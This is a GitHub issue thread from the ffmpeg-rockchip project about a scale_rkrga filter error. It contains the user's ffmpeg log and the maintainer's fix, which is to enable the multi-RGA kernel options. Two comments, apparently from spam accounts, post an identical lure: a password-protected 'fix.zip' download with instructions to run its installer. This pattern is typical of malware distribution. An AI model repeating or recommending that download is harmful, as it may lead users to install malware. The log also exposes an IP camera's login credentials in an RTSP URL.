nyanmisaka/ffmpeg-rockchip #106: The errors of fillter

trameshape, 2024-08-26:
=== Hi authors, this work is so great, but i have some trouble when using the scale_rkrga of fillter. Hope to get the message from you as soon as possible! Thanks! The detail of trouble is in the following lines:

(rk_tete) root@ok3588:/userdata/1-code/AI_conctrl_new/pull_stream# ffmpeg -rtsp_transport tcp -hwaccel rkmpp -hwaccel_output_format drm_prime -afbc rga -i "rtsp://admin:1234abcd@192.168.5.44/h265/ch1/main/av_stream?channel=1&subtype=1" -vf "scale_rkrga=format=bgr24,hwmap,format=bgr24" -f rawvideo -max_muxing_queue_size 1024 /dev/null
ffmpeg version 8164ff7 Copyright (c) 2000-2023 the FFmpeg developers
  built with gcc 9 (Ubuntu 9.3.0-10ubuntu2)
  configuration: --prefix=/usr --enable-gpl --enable-version3 --enable-libdrm --enable-rkmpp --enable-rkrga
  libavutil      58. 29.100 / 58. 29.100
  libavcodec     60. 31.102 / 60. 31.102
  libavformat    60. 16.100 / 60. 16.100
  libavdevice    60.  3.100 / 60.  3.100
  libavfilter     9. 12.100 /  9. 12.100
  libswscale      7.  5.100 /  7.  5.100
  libswresample   4. 12.100 /  4. 12.100
  libpostproc    57.  3.100 / 57.  3.100
Input #0, rtsp, from 'rtsp://admin:1234abcd@192.168.5.44/h265/ch1/main/av_stream?channel=1&subtype=1':
  Metadata:
    title           : Media Presentation
  Duration: N/A, start: 0.040000, bitrate: N/A
  Stream #0:0: Video: h264 (High), yuvj420p(pc, bt709, progressive), 1280x960, 25 fps, 25 tbr, 90k tbn
rga_api version 1.8.1_[4]
File '/dev/null' already exists. Overwrite? [y/N] y
Stream mapping:
  Stream #0:0 -> #0:0 (h264 (h264_rkmpp) -> rawvideo (native))
Press [q] to stop, [?] for help
[Parsed_scale_rkrga_0 @ 0x55b7a99d10] RGA async blit returned invalid fence_fd: 0
[vf#0:0 @ 0x55b7a99380] Error while filtering: Generic error in an external library
Failed to inject frame into filter network: Generic error in an external library
Error while filtering: Generic error in an external library
[out#0/rawvideo @ 0x55b7a871b0] Nothing was written into output file, because at least one of its streams received no packets.
frame=    0 fps=0.0 q=0.0 Lsize=       0kB time=N/A bitrate=N/A speed=N/A    
Conversion failed!

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nyanmisaka, 2024-08-27:
`[Parsed_scale_rkrga_0 @ 0x55b7a99d10] RGA async blit returned invalid fence_fd: 0`

Upgrade your linux kernel and enable the following RGA features.
Multi-rga needs to be enabled. The legacy one should be disabled.

```
#
# RGA
#
# CONFIG_ROCKCHIP_RGA is not set
# end of RGA

CONFIG_ROCKCHIP_MULTI_RGA=y
CONFIG_ROCKCHIP_RGA_ASYNC=y
# CONFIG_ROCKCHIP_RGA_PROC_FS is not set
CONFIG_ROCKCHIP_RGA_DEBUG_FS=y
CONFIG_ROCKCHIP_RGA_DEBUGGER=y
# CONFIG_ROCKCHIP_RVE is not set
```

closed 2024-08-27 by nyanmisaka